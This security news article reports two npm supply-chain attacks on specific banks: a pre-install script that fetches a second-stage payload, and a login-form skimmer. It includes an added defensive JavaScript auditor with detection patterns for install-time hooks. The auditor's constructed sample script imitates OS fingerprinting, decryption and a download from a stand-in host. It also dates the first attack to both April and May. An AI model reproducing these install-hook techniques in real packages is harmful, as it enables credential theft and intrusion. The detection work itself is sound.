Banks in Attackers Crosshairs, via Open Source Software Supply Chain

Published: 23/11/2024   Category: security



In separate targeted incidents, threat actors tried to upload malware into the Node Package Manager registry to gain access and steal credentials.



In two separate incidents, threat actors recently tried to introduce malware into the software development environment at two different banks via poisoned packages on the Node Package Manager (npm) registry.
Researchers at Checkmarx who observed the attacks believe them to be the first instances of adversaries targeting banks through the open source software supply chain. In a report this week, the vendor described the two attacks as part of a larger trend it has observed recently in which banks have been the specific targets.
"These attacks showcased advanced techniques, including targeting specific components in Web assets of the victim bank by attaching malicious functionalities to it," Checkmarx said.
The vendor highlighted an April attack in its report. In the incident, a threat actor posing as an employee of the target bank uploaded two malicious packages to the npm registry. Checkmarx researchers discovered a LinkedIn profile that suggested the package contributor worked at the target bank, and initially assumed the packages were part of a penetration test the bank was conducting.
The two npm packages contained a pre-install script that executed upon installation on a compromised system. The attack chain unfolded with the script first identifying the operating system of the host system. Then, depending on whether the OS is Windows, Linux, or MacOS, the script decrypted the appropriate encrypted files in the npm package. The attack chain continued with the decrypted files downloading a second-stage payload from an attacker-controlled command-and-control (C2) server.
"The attacker cleverly utilized Azure's CDN subdomains to effectively deliver the second-stage payload," Checkmarx said. This tactic is particularly effective because it bypasses traditional deny-list methods, since Azure is a legitimate service. To make the attack even more credible and harder to detect, the threat actor used a subdomain that incorporated the name of the target bank.
Checkmarx's research showed the second-stage payload to be Havoc Framework, a popular open source penetration testing framework that organizations often use for security testing and auditing. Havoc has become a popular post-exploitation tool among threat actors because of its ability to evade Windows Defender and other standard endpoint security controls, Checkmarx said.
"Deploying the Havoc framework would have given the attacker access to the infected machine inside the bank's network," says Aviad Gershon, security researcher at Checkmarx, in comments to Dark Reading. "From there, the consequences [would have been] dependent on the bank's defenses and the attacker's abilities and purpose — data theft, money theft, ransomware, etc."
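The attack chain above turns on an npm lifecycle hook (a pre-install script) that fingerprints the OS, decrypts a bundled blob and fetches a second stage. The following is an added defensive example, not Checkmarx's or npm's code: it audits a package's `package.json` lifecycle hooks and flags those indicators in the script they invoke. The package name, file contents and the `example.invalid` URL are constructed for the demonstration.

```javascript
// Lifecycle hooks that run automatically during `npm install`.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators modelled on the chain described in the article: OS fingerprinting,
// decryption of bundled files, and a download of a second-stage payload.
const INDICATORS = [
  { name: "os-fingerprint", re: /\b(os\.platform|process\.platform|os\.type)\b/ },
  { name: "decrypt", re: /\b(createDecipheriv|createDecipher)\b/ },
  { name: "network-fetch", re: /\b(https?\.get|https?\.request|fetch)\s*\(/ },
  { name: "spawn", re: /\b(child_process|execSync|spawn)\b/ },
];

// Audit one package. packageJson is the raw package.json text; scriptFiles maps
// a filename to its contents so "node <file>" hooks can be inspected.
// Returns the hooks present, the indicators found, and a block recommendation.
function auditPackage(packageJson, scriptFiles) {
  const pkg = JSON.parse(packageJson);
  const scripts = pkg.scripts || {};
  const hooks = LIFECYCLE_HOOKS.filter((h) => h in scripts);
  const findings = [];
  for (const hook of hooks) {
    const cmd = scripts[hook];
    // Resolve "node somefile.js" to the file body; otherwise scan the command itself.
    const m = cmd.match(/node\s+(\S+)/);
    const body = m && scriptFiles[m[1]] !== undefined ? scriptFiles[m[1]] : cmd;
    for (const ind of INDICATORS) {
      if (ind.re.test(body)) findings.push(`${hook}:${ind.name}`);
    }
  }
  // Two or more indicators inside an install-time hook is enough to hold the package.
  return { name: pkg.name, hooks, findings, block: findings.length >= 2 };
}

// Constructed sample resembling the behaviour described above (not the real package).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-bank-ui-helper",
  version: "1.0.0",
  scripts: { preinstall: "node setup.js" },
});
const SAMPLE_FILES = {
  "setup.js": [
    "const os = require('os'), crypto = require('crypto'), https = require('https');",
    "const blob = os.platform() === 'win32' ? 'w.enc' : 'u.enc';",
    "const d = crypto.createDecipheriv('aes-256-cbc', key, iv);",
    "https.get('https://example.invalid/stage2', () => {});",
  ].join("\n"),
};

console.log(JSON.stringify(auditPackage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES), null, 2));
```

In a CI pipeline this check belongs before the install step, alongside `npm install --ignore-scripts` for packages that have not yet been reviewed.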
The other attack that Checkmarx reported on this week happened in February. Here too, the threat actor — completely separate from the attacker in May — uploaded their own package containing a malicious payload to npm. In this instance, the payload was engineered specifically for the targeted bank. It was designed to hook onto a specific login form element on the bank's website and to capture and transmit information that users entered into the form when logging into the site.
Characteristics in both npm packages made them specific not just to the banking industry in general but to the particular banks as well, Gershon says. "The first attack we describe in the blog was obviously targeting a specific bank, falsifying a persona of a bank employee, and using crafted domains which include the bank's name," he says. "Both of these tactics were used in order to gain credibility and lure bank developers to download it. However, in this case, had another user not related to the bank downloaded the malicious package, they would have also been infected," Gershon adds.
"In the second attack, the adversary's payload targeted a specific and unique HTML element in a specific application of a specific bank," he says. Hence, in this instance, the poisoned package would probably not have harmed other users who downloaded and installed it. The attacker's motive in developing the package was to steal the login credentials that users would have entered into that specific HTML element.
Attacks involving the use of poisoned packages on popular open source repositories and package managers such as npm and PyPI have surged in recent years. A study that ReversingLabs conducted earlier this year, in fact, found a 289% increase in attacks on open source repositories since 2018. The goal behind many of these attacks is to sneak malicious code into enterprise software development environments to steal sensitive data and credentials, to surreptitiously install malware, and to carry out other malicious activities.
The attacks that Checkmarx reported this week are the first known instances of banks being specific targets in such attacks.
